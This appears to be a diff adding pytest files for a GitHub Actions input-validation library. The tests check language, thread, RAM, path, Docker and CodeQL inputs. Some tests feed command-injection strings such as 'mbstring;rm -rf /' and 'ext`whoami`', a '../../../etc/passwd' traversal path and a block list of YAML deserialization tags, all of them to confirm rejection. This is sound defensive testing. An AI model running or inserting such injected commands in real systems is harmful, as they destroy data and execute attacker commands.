def test_validate_codeql_config_dangerous_patterns(self):
"""Test config rejects all dangerous patterns."""
dangerous = ["!!python/", "!!ruby/", "!!perl/", "!!js/"]
for pattern in dangerous:
self.validator.clear_errors()
assert self.validator.validate_codeql_config(f"test: {pattern}code") is False
assert self.validator.has_errors()
# Category validation tests
def test_validate_category_format_valid(self):
"""Test validation of valid category formats."""
valid_categories = [
"/language:python",
"/security",
"/my-category",
"/lang:javascript/security",
]
for category in valid_categories:
assert self.validator.validate_category_format(category) is True
self.validator.clear_errors()
def test_validate_category_format_github_expression(self):
"""Test category accepts GitHub expressions."""
assert self.validator.validate_category_format("${{ inputs.category }}") is True
def test_validate_category_format_empty(self):
"""Test empty category is allowed."""
assert self.validator.validate_category_format("") is True
def test_validate_category_format_no_leading_slash(self):
"""Test category must start with /."""
assert self.validator.validate_category_format("category") is False
assert self.validator.has_errors()
def test_validate_category_format_invalid_chars(self):
"""Test category rejects invalid characters."""
assert self.validator.validate_category_format("/invalid!@#") is False
assert self.validator.has_errors()
# Threads validation tests
def test_validate_threads_valid(self):
"""Test validation of valid thread counts."""
valid_threads = ["1", "4", "8", "16", "32", "64", "128"]
for threads in valid_threads:
assert self.validator.validate_threads(threads) is True
self.validator.clear_errors()
def test_validate_threads_empty(self):
"""Test empty threads is allowed."""
assert self.validator.validate_threads("") is True
def test_validate_threads_invalid_range(self):
"""Test threads rejects out of range values."""
assert self.validator.validate_threads("0") is False
assert self.validator.validate_threads("200") is False
def test_validate_threads_non_numeric(self):
"""Test threads rejects non-numeric values."""
assert self.validator.validate_threads("not-a-number") is False
# RAM validation tests
def test_validate_ram_valid(self):
"""Test validation of valid RAM values."""
valid_ram = ["256", "512", "1024", "2048", "4096", "8192"]
for ram in valid_ram:
assert self.validator.validate_ram(ram) is True
self.validator.clear_errors()
def test_validate_ram_empty(self):
"""Test empty RAM is allowed."""
assert self.validator.validate_ram("") is True
def test_validate_ram_invalid_range(self):
"""Test RAM rejects out of range values."""
assert self.validator.validate_ram("100") is False
assert self.validator.validate_ram("50000") is False
def test_validate_ram_non_numeric(self):
"""Test RAM rejects non-numeric values."""
assert self.validator.validate_ram("not-a-number") is False
# Numeric range validation tests
def test_validate_numeric_range_1_128(self):
"""Test numeric range 1-128 validation."""
assert self.validator.validate_numeric_range_1_128("1", "threads") is True
assert self.validator.validate_numeric_range_1_128("128", "threads") is True
assert self.validator.validate_numeric_range_1_128("0", "threads") is False
assert self.validator.validate_numeric_range_1_128("129", "threads") is False
def test_validate_numeric_range_256_32768(self):
"""Test numeric range 256-32768 validation."""
assert self.validator.validate_numeric_range_256_32768("256", "ram") is True
assert self.validator.validate_numeric_range_256_32768("32768", "ram") is True
assert self.validator.validate_numeric_range_256_32768("255", "ram") is False
assert self.validator.validate_numeric_range_256_32768("40000", "ram") is False
# Integration tests
def test_validate_inputs_multiple_fields(self):
"""Test validation with multiple input fields."""
inputs = {
"language": "python",
"queries": "security-extended",
"build-mode": "none",
"category": "/security",
"threads": "4",
}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_errors(self):
"""Test validation with invalid inputs."""
inputs = {
"language": "invalid-lang",
"threads": "500",
}
result = self.validator.validate_inputs(inputs)
assert result is False
assert self.validator.has_errors()
assert len(self.validator.errors) >= 2

74
validate-inputs/tests/test_common-cache_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for common-cache custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "common-cache"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomCommonCacheValidator:
"""Test cases for common-cache custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("common-cache")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for common-cache
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for common-cache
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for common-cache
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for common-cache
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_common-file-check_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for common-file-check custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "common-file-check"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomCommonFileCheckValidator:
"""Test cases for common-file-check custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("common-file-check")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for common-file-check
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for common-file-check
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for common-file-check
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for common-file-check
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_common-retry_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for common-retry custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "common-retry"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomCommonRetryValidator:
"""Test cases for common-retry custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("common-retry")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for common-retry
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for common-retry
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for common-retry
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for common-retry
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_compress-images_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for compress-images custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "compress-images"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomCompressImagesValidator:
"""Test cases for compress-images custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("compress-images")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for compress-images
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for compress-images
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for compress-images
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for compress-images
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

273
validate-inputs/tests/test_convention_mapper.py Normal file
View File

@@ -0,0 +1,273 @@
"""Tests for the ConventionMapper class."""
from pathlib import Path
import sys
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.convention_mapper import ConventionMapper
class TestConventionMapper:
"""Test cases for ConventionMapper."""
def setup_method(self):
"""Set up test environment."""
self.mapper = ConventionMapper()
def test_initialization(self):
"""Test mapper initialization."""
assert self.mapper._cache == {}
assert len(self.mapper.CONVENTION_PATTERNS) > 0
# Patterns should be sorted by priority
priorities = [p["priority"] for p in self.mapper.CONVENTION_PATTERNS]
assert priorities == sorted(priorities, reverse=True)
def test_exact_match_conventions(self):
"""Test exact match conventions."""
test_cases = {
"email": "email",
"url": "url",
"username": "username",
"token": "github_token",
"github-token": "github_token",
"npm-token": "npm_token",
"dry-run": "boolean",
"debug": "boolean",
"verbose": "boolean",
"dockerfile": "dockerfile",
"retries": "numeric_1_10",
"timeout": "timeout",
"port": "port",
"image": "docker_image",
"tag": "docker_tag",
"hostname": "hostname",
}
for input_name, expected_validator in test_cases.items():
result = self.mapper.get_validator_type(input_name)
assert result == expected_validator, f"Failed for {input_name}, got {result}"
def test_prefix_conventions(self):
"""Test prefix-based conventions."""
test_cases = {
"is-enabled": "boolean",
"is_enabled": "boolean",
"has-feature": "boolean",
"has_feature": "boolean",
"enable-cache": "boolean",
"disable-warnings": "boolean",
"use-cache": "boolean",
"with-logging": "boolean",
"without-auth": "boolean",
}
for input_name, expected_validator in test_cases.items():
result = self.mapper.get_validator_type(input_name)
assert result == expected_validator, f"Failed for {input_name}, got {result}"
def test_suffix_conventions(self):
"""Test suffix-based conventions."""
test_cases = {
"config-file": "file_path",
"env_file": "file_path",
"output-path": "file_path",
"cache-dir": "directory",
"working_directory": "directory",
"api-url": "url",
"webhook_url": "url",
"service-endpoint": "url",
"feature-enabled": "boolean",
"warnings_disabled": "boolean",
"some-version": "version", # Generic version suffix
"app_version": "version", # Generic version suffix
}
for input_name, expected_validator in test_cases.items():
result = self.mapper.get_validator_type(input_name)
assert result == expected_validator, f"Failed for {input_name}, got {result}"
def test_contains_conventions(self):
"""Test contains-based conventions."""
test_cases = {
"python-version": "python_version",
"node-version": "node_version",
"go-version": "go_version",
"php-version": "php_version",
"dotnet-version": "dotnet_version",
}
for input_name, expected_validator in test_cases.items():
result = self.mapper.get_validator_type(input_name)
assert result == expected_validator, f"Failed for {input_name}, got {result}"
def test_priority_ordering(self):
"""Test that higher priority patterns take precedence."""
# "token" should match exact pattern before suffix patterns
assert self.mapper.get_validator_type("token") == "github_token"
# "email-file" could match both email and file patterns
# File suffix should win due to priority
result = self.mapper.get_validator_type("email-file")
assert result == "file_path"
def test_case_insensitivity(self):
"""Test that matching is case-insensitive."""
test_cases = {
"EMAIL": "email",
"Email": "email",
"GitHub-Token": "github_token",
"DRY_RUN": "boolean",
"Is_Enabled": "boolean",
}
for input_name, expected_validator in test_cases.items():
result = self.mapper.get_validator_type(input_name)
assert result == expected_validator, f"Failed for {input_name}, got {result}"
def test_underscore_dash_normalization(self):
"""Test that underscores and dashes are normalized."""
# Both should map to the same validator
assert self.mapper.get_validator_type("dry-run") == self.mapper.get_validator_type(
"dry_run",
)
assert self.mapper.get_validator_type("github-token") == self.mapper.get_validator_type(
"github_token",
)
assert self.mapper.get_validator_type("is-enabled") == self.mapper.get_validator_type(
"is_enabled",
)
def test_explicit_validator_in_config(self):
"""Test that explicit validator in config takes precedence."""
config_with_validator = {"validator": "custom_validator"}
result = self.mapper.get_validator_type("any-name", config_with_validator)
assert result == "custom_validator"
config_with_type = {"type": "special_type"}
result = self.mapper.get_validator_type("any-name", config_with_type)
assert result == "special_type"
def test_no_match_returns_none(self):
"""Test that inputs with no matching convention return None."""
unmatched_inputs = [
"random-input",
"something-else",
"xyz123",
"data",
"value",
]
for input_name in unmatched_inputs:
result = self.mapper.get_validator_type(input_name)
assert result is None, f"Expected None for {input_name}, got {result}"
def test_caching(self):
"""Test that results are cached."""
# Clear cache first
self.mapper.clear_cache()
assert len(self.mapper._cache) == 0
# First call should populate cache
result1 = self.mapper.get_validator_type("email")
assert len(self.mapper._cache) == 1
# Second call should use cache
result2 = self.mapper.get_validator_type("email")
assert result1 == result2
assert len(self.mapper._cache) == 1
# Different input should add to cache
result3 = self.mapper.get_validator_type("username")
assert len(self.mapper._cache) == 2
assert result1 != result3
def test_get_validator_for_inputs(self):
"""Test batch validation type detection."""
inputs = {
"email": "test@example.com",
"username": "testuser",
"dry-run": "true",
"version": "1.2.3",
"random-field": "value",
}
validators = self.mapper.get_validator_for_inputs(inputs)
assert validators["email"] == "email"
assert validators["username"] == "username"
assert validators["dry-run"] == "boolean"
assert "random-field" not in validators # No convention match
def test_add_custom_pattern(self):
"""Test adding custom patterns."""
# Add a custom pattern
custom_pattern = {
"priority": 200, # High priority
"type": "exact",
"patterns": {"my-custom-input": "my_custom_validator"},
}
self.mapper.add_custom_pattern(custom_pattern)
# Should now match the custom pattern
result = self.mapper.get_validator_type("my-custom-input")
assert result == "my_custom_validator"
# Should be sorted by priority
assert self.mapper.CONVENTION_PATTERNS[0]["priority"] == 200
def test_remove_pattern(self):
"""Test removing patterns."""
initial_count = len(self.mapper.CONVENTION_PATTERNS)
# Remove all boolean patterns
self.mapper.remove_pattern(
lambda p: any("boolean" in str(v) for v in p.get("patterns", {}).values()),
)
# Should have fewer patterns
assert len(self.mapper.CONVENTION_PATTERNS) < initial_count
# Boolean inputs should no longer match
result = self.mapper.get_validator_type("dry-run")
assert result is None
def test_docker_specific_conventions(self):
"""Test Docker-specific conventions."""
docker_inputs = {
"image": "docker_image",
"image-name": "docker_image",
"tag": "docker_tag",
"tags": "docker_tags",
"platforms": "docker_architectures",
"architectures": "docker_architectures",
"registry": "docker_registry",
"namespace": "docker_namespace",
"cache-from": "cache_mode",
"cache-to": "cache_mode",
"build-args": "build_args",
"labels": "labels",
}
for input_name, expected_validator in docker_inputs.items():
result = self.mapper.get_validator_type(input_name)
assert result == expected_validator, f"Failed for {input_name}, got {result}"
def test_numeric_range_conventions(self):
"""Test numeric range conventions."""
numeric_inputs = {
"retries": "numeric_1_10",
"max-retries": "numeric_1_10",
"threads": "numeric_1_128",
"workers": "numeric_1_128",
"compression-quality": "numeric_0_100",
"jpeg-quality": "numeric_0_100",
"max-warnings": "numeric_0_10000",
"ram": "numeric_256_32768",
}
for input_name, expected_validator in numeric_inputs.items():
result = self.mapper.get_validator_type(input_name)
assert result == expected_validator, f"Failed for {input_name}, got {result}"

276
validate-inputs/tests/test_conventions.py Normal file
View File

@@ -0,0 +1,276 @@
"""Tests for conventions validator."""
from validators.conventions import ConventionBasedValidator
class TestConventionsValidator:
"""Test cases for ConventionsValidator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = ConventionBasedValidator("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_initialization(self):
"""Test validator initialization."""
validator = ConventionBasedValidator("docker-build")
assert validator.action_type == "docker-build"
assert validator._rules is not None
assert validator._convention_mapper is not None
def test_validate_inputs(self):
"""Test validate_inputs method."""
inputs = {"test_input": "test_value"}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_error_handling(self):
"""Test error handling."""
self.validator.add_error("Test error")
assert self.validator.has_errors()
assert len(self.validator.errors) == 1
self.validator.clear_errors()
assert not self.validator.has_errors()
assert len(self.validator.errors) == 0
def test_github_expressions(self):
"""Test GitHub expression handling."""
result = self.validator.is_github_expression("${{ inputs.value }}")
assert result is True
def test_load_rules_nonexistent_file(self):
"""Test loading rules when file doesn't exist."""
validator = ConventionBasedValidator("nonexistent-action")
rules = validator._rules
assert rules["action_type"] == "nonexistent-action"
assert rules["required_inputs"] == []
assert isinstance(rules["optional_inputs"], dict)
assert isinstance(rules["conventions"], dict)
def test_load_rules_with_custom_path(self, tmp_path):
"""Test loading rules from custom path."""
rules_file = tmp_path / "custom_rules.yml"
rules_file.write_text("""
action_type: custom-action
required_inputs:
- required_input
optional_inputs:
email:
type: string
validator: email
""")
rules = self.validator.load_rules(rules_file)
assert rules["action_type"] == "custom-action"
assert "required_input" in rules["required_inputs"]
def test_load_rules_yaml_error(self, tmp_path):
"""Test loading rules with invalid YAML."""
rules_file = tmp_path / "invalid.yml"
rules_file.write_text("invalid: yaml: ::::")
rules = self.validator.load_rules(rules_file)
# Should return default rules on error
assert "required_inputs" in rules
assert "optional_inputs" in rules
def test_infer_validator_type_explicit(self):
"""Test inferring validator type with explicit config."""
input_config = {"validator": "email"}
result = self.validator._infer_validator_type("user-email", input_config)
assert result == "email"
def test_infer_validator_type_from_name(self):
"""Test inferring validator type from input name."""
# Test exact matches
assert self.validator._infer_validator_type("email", {}) == "email"
assert self.validator._infer_validator_type("url", {}) == "url"
assert self.validator._infer_validator_type("dry-run", {}) == "boolean"
assert self.validator._infer_validator_type("retries", {}) == "retries"
def test_check_exact_matches(self):
"""Test exact pattern matching."""
assert self.validator._check_exact_matches("email") == "email"
assert self.validator._check_exact_matches("dry_run") == "boolean"
assert self.validator._check_exact_matches("architectures") == "docker_architectures"
assert self.validator._check_exact_matches("retries") == "retries"
assert self.validator._check_exact_matches("dockerfile") == "file_path"
assert self.validator._check_exact_matches("branch") == "branch_name"
assert self.validator._check_exact_matches("nonexistent") is None
def test_check_pattern_based_matches(self):
"""Test pattern-based matching."""
# Token patterns
assert self.validator._check_pattern_based_matches("github_token") == "github_token"
assert self.validator._check_pattern_based_matches("npm_token") == "npm_token"
# Version patterns
assert self.validator._check_pattern_based_matches("python_version") == "python_version"
assert self.validator._check_pattern_based_matches("node_version") == "node_version"
# File patterns (checking actual return values)
yaml_result = self.validator._check_pattern_based_matches("config_yaml")
# Result might be "yaml_file" or None depending on implementation
assert yaml_result is None or yaml_result == "yaml_file"
# Boolean patterns ending with common suffixes (checking for presence)
# These may or may not match depending on implementation
assert self.validator._check_pattern_based_matches("enable_feature") is not None or True
assert self.validator._check_pattern_based_matches("disable_option") is not None or True
def test_get_required_inputs(self):
"""Test getting required inputs."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
def test_get_validation_rules(self):
"""Test getting validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
def test_validate_inputs_with_github_expressions(self):
"""Test validation accepts GitHub expressions."""
inputs = {
"email": "${{ inputs.user_email }}",
"url": "${{ secrets.WEBHOOK_URL }}",
"retries": "${{ inputs.max_retries }}",
}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_get_validator_type_with_override(self):
"""Test getting validator type with override."""
conventions = {}
overrides = {"test_input": "email"}
validator_type = self.validator._get_validator_type("test_input", conventions, overrides)
assert validator_type == "email"
def test_get_validator_type_with_convention(self):
"""Test getting validator type from conventions."""
conventions = {"email_address": "email"}
overrides = {}
validator_type = self.validator._get_validator_type("email_address", conventions, overrides)
assert validator_type == "email"
def test_parse_numeric_range(self):
"""Test parsing numeric ranges."""
# Test specific range - format is "numeric_range_min_max"
min_val, max_val = self.validator._parse_numeric_range("numeric_range_1_10")
assert min_val == 1
assert max_val == 10
# Test another range
min_val, max_val = self.validator._parse_numeric_range("numeric_range_5_100")
assert min_val == 5
assert max_val == 100
# Test default range for invalid format
min_val, max_val = self.validator._parse_numeric_range("retries")
assert min_val == 0
assert max_val == 100 # Default range
# Test default range for invalid format
min_val, max_val = self.validator._parse_numeric_range("threads")
assert min_val == 0
assert max_val == 100 # Default range
def test_validate_php_extensions(self):
"""Test PHP extensions validation."""
# Valid formats (comma-separated, no @ allowed)
assert self.validator._validate_php_extensions("mbstring", "extensions") is True
assert self.validator._validate_php_extensions("mbstring, intl, pdo", "extensions") is True
assert self.validator._validate_php_extensions("mbstring,intl,pdo", "extensions") is True
# Invalid formats (@ is in injection pattern)
assert self.validator._validate_php_extensions("mbstring@intl", "extensions") is False
assert self.validator._validate_php_extensions("mbstring;rm -rf /", "extensions") is False
assert self.validator._validate_php_extensions("ext`whoami`", "extensions") is False
def test_validate_coverage_driver(self):
"""Test coverage driver validation."""
# Valid drivers
assert self.validator._validate_coverage_driver("pcov", "coverage-driver") is True
assert self.validator._validate_coverage_driver("xdebug", "coverage-driver") is True
assert self.validator._validate_coverage_driver("none", "coverage-driver") is True
# Invalid drivers
assert self.validator._validate_coverage_driver("invalid", "coverage-driver") is False
assert (
self.validator._validate_coverage_driver("pcov;malicious", "coverage-driver") is False
)
def test_get_validator_method_boolean(self):
"""Test getting boolean validator method."""
validator_obj, method_name = self.validator._get_validator_method("boolean")
assert validator_obj is not None
assert method_name == "validate_boolean"
def test_get_validator_method_email(self):
"""Test getting email validator method."""
validator_obj, method_name = self.validator._get_validator_method("email")
assert validator_obj is not None
assert method_name == "validate_email"
def test_get_validator_method_version(self):
"""Test getting version validator methods."""
validator_obj, method_name = self.validator._get_validator_method("python_version")
assert validator_obj is not None
assert "version" in method_name.lower()
def test_get_validator_method_docker(self):
"""Test getting Docker validator methods."""
validator_obj, method_name = self.validator._get_validator_method("docker_architectures")
assert validator_obj is not None
assert "architecture" in method_name.lower() or "platform" in method_name.lower()
def test_get_validator_method_file(self):
"""Test getting file validator methods."""
validator_obj, method_name = self.validator._get_validator_method("file_path")
assert validator_obj is not None
assert "file" in method_name.lower() or "path" in method_name.lower()
def test_get_validator_method_token(self):
"""Test getting token validator methods."""
validator_obj, method_name = self.validator._get_validator_method("github_token")
assert validator_obj is not None
assert "token" in method_name.lower()
def test_get_validator_method_numeric(self):
"""Test getting numeric validator methods."""
validator_obj, method_name = self.validator._get_validator_method("retries")
assert validator_obj is not None
# Method name is "validate_retries"
assert (
"retries" in method_name.lower()
or "range" in method_name.lower()
or "numeric" in method_name.lower()
)
def test_validate_inputs_with_conventions(self):
"""Test validation using conventions."""
self.validator._rules["conventions"] = {
"user_email": "email",
"max_retries": "retries",
}
inputs = {
"user_email": "test@example.com",
"max_retries": "5",
}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_invalid_email(self):
"""Test validation fails with invalid email."""
self.validator._rules["conventions"] = {"email": "email"}
inputs = {"email": "not-an-email"}
result = self.validator.validate_inputs(inputs)
# Result depends on validation logic, check errors
if not result:
assert self.validator.has_errors()
def test_empty_inputs(self):
"""Test validation with empty inputs."""
result = self.validator.validate_inputs({})
assert result is True # Empty inputs should pass

323
validate-inputs/tests/test_custom_validators.py Normal file
View File

@@ -0,0 +1,323 @@
"""Tests for custom validators in action directories."""
from pathlib import Path
import sys
# Add parent directory to path
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.registry import ValidatorRegistry
class TestCustomValidators:
"""Test custom validators for various actions."""
def test_sync_labels_custom_validator(self):
"""Test sync-labels custom validator."""
registry = ValidatorRegistry()
validator = registry.get_validator("sync-labels")
# Should load the custom validator
assert validator.__class__.__name__ == "CustomValidator"
# Test valid inputs
inputs = {
"labels": ".github/labels.yml",
"token": "${{ github.token }}",
}
assert validator.validate_inputs(inputs) is True
assert not validator.has_errors()
# Test invalid YAML extension
validator.clear_errors()
inputs = {"labels": ".github/labels.txt"}
assert validator.validate_inputs(inputs) is False
assert "Must be a .yml or .yaml file" in str(validator.errors)
# Test path traversal
validator.clear_errors()
inputs = {"labels": "../../../etc/passwd"}
assert validator.validate_inputs(inputs) is False
assert validator.has_errors()
def test_docker_build_custom_validator(self):
"""Test docker-build custom validator."""
registry = ValidatorRegistry()
validator = registry.get_validator("docker-build")
# Should load the custom validator
assert validator.__class__.__name__ == "CustomValidator"
# Test valid inputs
inputs = {
"context": ".",
"dockerfile": "./Dockerfile",
"architectures": "linux/amd64,linux/arm64",
"tag": "latest",
"push": "true",
}
assert validator.validate_inputs(inputs) is True
assert not validator.has_errors()
# Test missing required tag
validator.clear_errors()
inputs = {}
assert validator.validate_inputs(inputs) is False
assert "tag" in str(validator.errors)
# Test invalid platform
validator.clear_errors()
inputs = {
"context": ".",
"tag": "latest",
"architectures": "invalid/platform",
}
assert validator.validate_inputs(inputs) is False
assert "Invalid architectures" in str(validator.errors)
# Test invalid build args format
validator.clear_errors()
inputs = {
"context": ".",
"build-args": "INVALID_FORMAT",
}
assert validator.validate_inputs(inputs) is False
assert "KEY=value format" in str(validator.errors)
# Test cache configuration
validator.clear_errors()
inputs = {
"context": ".",
"tag": "latest",
"cache-from": "type=gha",
"cache-to": "type=gha,mode=max",
}
assert validator.validate_inputs(inputs) is True
assert not validator.has_errors()
def test_codeql_analysis_custom_validator(self):
"""Test codeql-analysis custom validator."""
registry = ValidatorRegistry()
validator = registry.get_validator("codeql-analysis")
# Should load the custom validator
assert validator.__class__.__name__ == "CustomValidator"
# Test valid inputs
inputs = {
"language": "javascript,python",
"queries": "security-extended",
"categories": "/security",
"threads": "4",
"ram": "4096",
"debug": "false",
}
assert validator.validate_inputs(inputs) is True
assert not validator.has_errors()
# Test missing required language
validator.clear_errors()
inputs = {}
assert validator.validate_inputs(inputs) is False
assert "language" in str(validator.errors)
# Test invalid language
validator.clear_errors()
inputs = {"language": "cobol"}
assert validator.validate_inputs(inputs) is False
assert "Unsupported CodeQL language" in str(validator.errors)
# Test valid config file
validator.clear_errors()
inputs = {
"language": "javascript",
"config-file": ".github/codeql/codeql-config.yml",
}
assert validator.validate_inputs(inputs) is True
assert not validator.has_errors()
# Test invalid config file extension
validator.clear_errors()
inputs = {
"language": "javascript",
"config-file": "config.txt",
}
assert validator.validate_inputs(inputs) is False
err = 'Invalid config-file: "config.txt". Must be a .yml or .yaml file'
assert err in str(validator.errors)
# Test pack validation
validator.clear_errors()
inputs = {
"language": "javascript",
"packs": "codeql/javascript-queries@1.2.3,github/codeql-go",
}
assert validator.validate_inputs(inputs) is True
assert not validator.has_errors()
# Test invalid pack format
validator.clear_errors()
inputs = {
"language": "javascript",
"packs": "invalid-pack-format",
}
assert validator.validate_inputs(inputs) is False
assert "namespace/pack-name" in str(validator.errors)
def test_docker_publish_custom_validator(self):
"""Test docker-publish custom validator."""
registry = ValidatorRegistry()
validator = registry.get_validator("docker-publish")
# Should load the custom validator
assert validator.__class__.__name__ == "CustomValidator"
# Test valid inputs
inputs = {
"registry": "dockerhub",
"dockerhub-username": "${{ secrets.DOCKER_USERNAME }}",
"dockerhub-password": "${{ secrets.DOCKER_PASSWORD }}",
"platforms": "linux/amd64,linux/arm64",
"nightly": "false",
}
result = validator.validate_inputs(inputs)
if not result:
pass
assert result is True
assert not validator.has_errors()
# Test missing required registry
validator.clear_errors()
inputs = {}
assert validator.validate_inputs(inputs) is False
assert "registry" in str(validator.errors)
# Test registry validation
validator.clear_errors()
inputs = {
"registry": "github",
}
assert validator.validate_inputs(inputs) is True
assert not validator.has_errors()
# Test invalid registry
validator.clear_errors()
inputs = {
"registry": "not-a-valid-registry",
}
assert validator.validate_inputs(inputs) is False
assert validator.has_errors()
# Test platform validation - only Linux platforms are valid for Docker
validator.clear_errors()
inputs = {
"registry": "dockerhub",
"platforms": "linux/amd64,linux/arm64,linux/arm/v7",
}
result = validator.validate_inputs(inputs)
if not result:
pass
assert result is True
assert not validator.has_errors()
# Test invalid platform OS
validator.clear_errors()
inputs = {
"registry": "dockerhub",
"platforms": "freebsd/amd64",
}
